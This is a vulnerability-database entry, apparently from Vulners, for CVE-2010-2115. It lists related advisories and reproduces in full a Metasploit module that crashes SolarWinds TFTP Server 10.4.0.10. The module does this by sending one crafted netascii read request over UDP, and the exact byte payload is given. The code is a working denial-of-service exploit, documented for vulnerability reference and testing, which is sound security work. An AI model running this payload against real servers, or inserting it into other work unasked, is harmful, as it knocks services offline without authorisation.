| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2010-2115 | 21 May 201000:00 | – | circl | |
| CVE-2010-2115 | 28 May 201020:00 | – | cve | |
| CVE-2010-2115 | 28 May 201020:00 | – | cvelist | |
| SolarWinds TFTP Server 10.4.0.10 Denial of Service | 4 Jun 201001:20 | – | metasploit | |
| CVE-2010-2115 | 28 May 201020:30 | – | nvd | |
| SolarWinds TFTP Server 10.4.0.10 'Read' Request (Opcode 0x01) DoS Vulnerability - Active Check | 25 May 201000:00 | – | openvas | |
| Cross site request forgery (csrf) | 28 May 201020:30 | – | prion | |
| SolarWinds TFTP Server < 10.4.0.13 DoS | 25 Jun 201000:00 | – | nessus |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'SolarWinds TFTP Server 10.4.0.10 Denial of Service' ,
'Description' => %q{
The SolarWinds TFTP server can be shut down by sending a 'netascii' read
request with a specially crafted file name.
},
'Author' => 'Nullthreat',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-2115' ],
[ 'OSVDB', '64845' ],
[ 'EDB', '12683' ]
],
'DisclosureDate' => '2010-05-21'))
register_options([
Opt::RPORT(69)
])
end
def run
connect_udp
print_status("Sending Crash request...")
udp_sock.put("\x00\x01\x01\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00")
disconnect_udp
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation